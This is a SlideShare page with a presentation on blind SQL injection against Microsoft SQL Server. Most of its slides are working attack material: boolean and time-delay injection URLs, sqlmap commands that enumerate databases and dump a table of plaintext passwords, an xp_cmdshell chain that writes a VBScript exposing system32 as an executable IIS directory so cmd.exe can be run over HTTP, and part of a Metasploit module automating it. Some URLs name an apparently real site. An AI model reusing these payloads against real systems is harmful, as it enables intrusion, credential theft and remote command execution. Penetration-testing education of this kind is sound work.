Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Blind SQL Injection
Blind SQL Injection
• We have SQL injection point but it is not throwing any error message out
as part of its response. Ap...
Checks…
• AND 1=1
• DBO check
http://192.168.50.50/details.aspx?id=1+AND+USER_NAME()='dbo'
• Wait delay call
http://192.16...
Running tools
• SQL Map or Absinthe
D:toolssqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1
sqlmap/0.4 coded ...
Enumeration…
D:toolssqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1 --dbs
sqlmap/0.4 coded by inquis <bernar...
Enumeration…
D:toolssqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1 --tables -D
catalog
sqlmap/0.4 coded by inq...
Enumeration…
D:toolssqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1 --dump -D ca
talog -T auth
sqlmap/0.4 coded...
Exploiting
Set WshShell = WScript.CreateObject("WScript.Shell")
Set ObjExec = WshShell.Exec("cmd.exe /c echo %windir%")
wi...
Get the cmd.exe
• Run command over HTTP/HTTPS
• http://target/secret/system32/cmd.exe?+/c+set
Metasploit …
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RP...
Metasploit…
Conclusion
Upcoming SlideShare
Loading in …5
×

Blind SQL Injection

2,116 views

Published on

This presentation covers blind SQL injection techniques.

Published in: Technology
  • Be the first to comment

  • Be the first to like this

Blind SQL Injection

  1. 1. Blind SQL Injection
  2. 2. Blind SQL Injection • We have SQL injection point but it is not throwing any error message out as part of its response. Application is sending customized error page which is not revealing any signature by which we can deduce potential SQL flaw. • Knowing SQL injection point or loophole in web application, xp_cmdshell seems to be working. But we can’t say is it working or not since it doesn’t return any meaningful signature. This is “blind xp_cmdshell”. • Firewall don’t allow outbound traffic so can’t do ftp, tftp, ping etc from the box to the Internet by which you can confirm execution of the command on the target system. • We don’t know the actual path to webroot so can’t copy file to location which can be accessed over HTTP or HTTPS later to confirm the execution of the command. • If we know path to webroot and directory structure but can’t find execute permission on it so can’t copy cmd.exe or any other binary and execute over HTTP/HTTPS.
  3. 3. Checks… • AND 1=1 • DBO check http://192.168.50.50/details.aspx?id=1+AND+USER_NAME()='dbo' • Wait delay call http://192.168.50.50/details.aspx?id=1;waitfor+delay+'0:0:10' • (SELECT+ASCII(SUBSTRING((a.loginame),1,1)) +FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115 • http://www.dvds4less.net/details.aspx?id=1+AND+ (SELECT+ASCII(SUBSTRING((a.loginame),1,1)) +FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=114 • http://www.dvds4less.net/details.aspx?id=1+AND+ (SELECT+ASCII(SUBSTRING((a.loginame),2,1)) +FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=97
  4. 4. Running tools • SQL Map or Absinthe D:toolssqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1 sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com> [*] starting at: 18:47:58 [18:48:00] [WARNING] the remote DMBS is not MySQL [18:48:00] [WARNING] the remote DMBS is not PostgreSQL remote DBMS: Microsoft SQL Server banner: --- Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2) --- [*] shutting down at: 18:48:14
  5. 5. Enumeration… D:toolssqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1 --dbs sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com> [*] starting at: 18:53:10 [18:53:12] [WARNING] the remote DMBS is not MySQL [18:53:12] [WARNING] the remote DMBS is not PostgreSQL remote DBMS: Microsoft SQL Server banner: --- Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2) --- available databases [9]: [*] CmdExec_example [*] Dashboard [*] catalog [*] demotrading [*] master [*] model [*] msdb [*] order [*] tempdb [*] shutting down at: 18:55:07
  6. 6. Enumeration… D:toolssqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1 --tables -D catalog sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com> [*] starting at: 18:59:21 [18:59:22] [WARNING] the remote DMBS is not MySQL [18:59:22] [WARNING] the remote DMBS is not PostgreSQL remote DBMS: Microsoft SQL Server Database: catalog [3 tables] +--------------+ | auth | | dtproperties | | items | +--------------+
  7. 7. Enumeration… D:toolssqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1 --dump -D ca talog -T auth sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com> [*] starting at: 19:01:27 [19:01:28] [WARNING] the remote DMBS is not MySQL [19:01:28] [WARNING] the remote DMBS is not PostgreSQL remote DBMS: Microsoft SQL Server Database: catalog Table: auth [3 entries] +--------+------+---------+ | access | user | pass | +--------+------+---------+ | 101010 | dbo | john123 | | 110011 | | great | | 001011 | | loveit | +--------+------+---------+
  8. 8. Exploiting Set WshShell = WScript.CreateObject("WScript.Shell") Set ObjExec = WshShell.Exec("cmd.exe /c echo %windir%") windir = ObjExec.StdOut.ReadLine() Set Root = GetObject("IIS://LocalHost/W3SVC/1/ROOT") Set Dir = Root.Create("IIsWebVirtualDir", "secret") Dir.Path = windir Dir.AccessExecute = True Dir.SetInfo http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ' Set WshShell = WScript.CreateObject("WScript.Shell") > c:secret.vbs’ ….. ….. ….. http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ' Dir.SetInfo >> c:secret.vbs’ http://target/details.asp?id=1;exec+master..xp_cmdshell+'cscript+c:secret.vbs’
  9. 9. Get the cmd.exe • Run command over HTTP/HTTPS • http://target/secret/system32/cmd.exe?+/c+set
  10. 10. Metasploit … sub Exploit { my $self = shift; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $path = $self->GetVar('RPATH'); my $vhost = $self->GetVar('VHOST'); my @url = split(/#/, $path); my @payload = ("EXEC+master..xp_cmdshell+'echo+Set+WshShell+=+WScript.CreateObject("WScript.Shell")>c:secret.vbs'", "EXEC+master..xp_cmdshell+'echo+Set+Root+=+GetObject("IIS://LocalHost/W3SVC/1/ROOT")>>c:secret.vbs'", "EXEC+master..xp_cmdshell+'echo+Set+Dir+=+Root.Create("IIsWebVirtualDir","secret")>>c:secret.vb s'", "EXEC+master..xp_cmdshell+'echo+Dir.Path+=+"c:winntsystem32">>c:secret.vbs'", "EXEC+master..xp_cmdshell+'echo+Dir.AccessExecute+=+True>>c:secret.vbs'", "EXEC+master..xp_cmdshell+'echo+Dir.SetInfo>>c:secret.vbs'", "EXEC+master..xp_cmdshell+'cscript+c:secret.vbs'" ); $self->PrintLine("[+] Sending SQL injection payload..."); for(my $count=0;$count<=6;$count++) ..
  11. 11. Metasploit…
  12. 12. Conclusion

×